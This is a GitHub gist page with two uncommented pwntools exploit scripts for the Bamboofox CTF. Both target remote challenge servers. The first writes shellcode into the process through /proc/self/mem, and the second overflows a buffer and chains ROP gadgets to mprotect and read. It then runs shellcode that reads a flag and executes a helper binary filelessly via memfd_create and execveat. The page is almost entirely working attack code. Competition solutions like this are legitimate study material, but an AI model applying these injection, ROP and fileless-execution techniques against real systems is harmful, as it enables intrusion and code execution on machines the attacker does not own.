Skip to content

Instantly share code, notes, and snippets.

@st424204

st424204/abw.py

Last active January 1, 2020 10:35
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save st424204/1e349ecf576b21803df3fb376aec7282 to your computer and use it in GitHub Desktop.
Save st424204/1e349ecf576b21803df3fb376aec7282 to your computer and use it in GitHub Desktop.
Download ZIP
Bamboofox CTF
Raw
abw.py
from pwn import *
context.arch = "amd64"
r = remote("34.82.101.212", 10010)
r.sendlineafter(":","/proc/self/mem")
r.sendlineafter(":",str(0x4b0f40))
payload = asm("""
push rax
pop rdi
push rsp
pop rsi
push 0x60
pop rdx
syscall
ret
""")
print len(payload)
r.sendlineafter(":",payload.encode("hex"))
r.send(p64(0x0000000000421872)+p64(0x4112af)+p64(0x41f4e0))
r.interactive()
Raw
app.py
from pwn import *
context.arch = "amd64"
#r = process('./run.sh')
r = remote("34.82.101.212", 10011)
#0x0000000000474a05: syscall; ret;
#0x000000000044b9d9: pop rdx; pop rsi; ret;
#0x0000000000415234: pop rax; ret;
#0x0000000000400686: pop rdi; ret;
#0x000000000043ff98: add al, 7; ret;
payload = "a"*0x108
payload += flat(
0x415234,3,0x43ff98,0x400686,0x006b6000,0x44b9d9,0x7,0x6000,0x474a05,
0x415234,0,0x400686,0,0x44b9d9,0x1000,0x006b6000,0x474a05,0x006b6000
)
r.sendline(payload)
r.send(asm(shellcraft.cat("flag1")+
shellcraft.pushstr("Joker")+
"""
mov rax,319
mov rdi,rsp
mov rsi,0
syscall
mov rbx,rax
mov rbp,rax"""+
shellcraft.pushstr("#!/read_flag\n")+
shellcraft.syscall('SYS_write','rbp','rsp',13)+
"""
push 0
mov rsi,rsp
xor rdx,rdx
xor r10,r10
mov r8,0x1000
mov rax,322
syscall
""" +
shellcraft.exit(0)
))
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment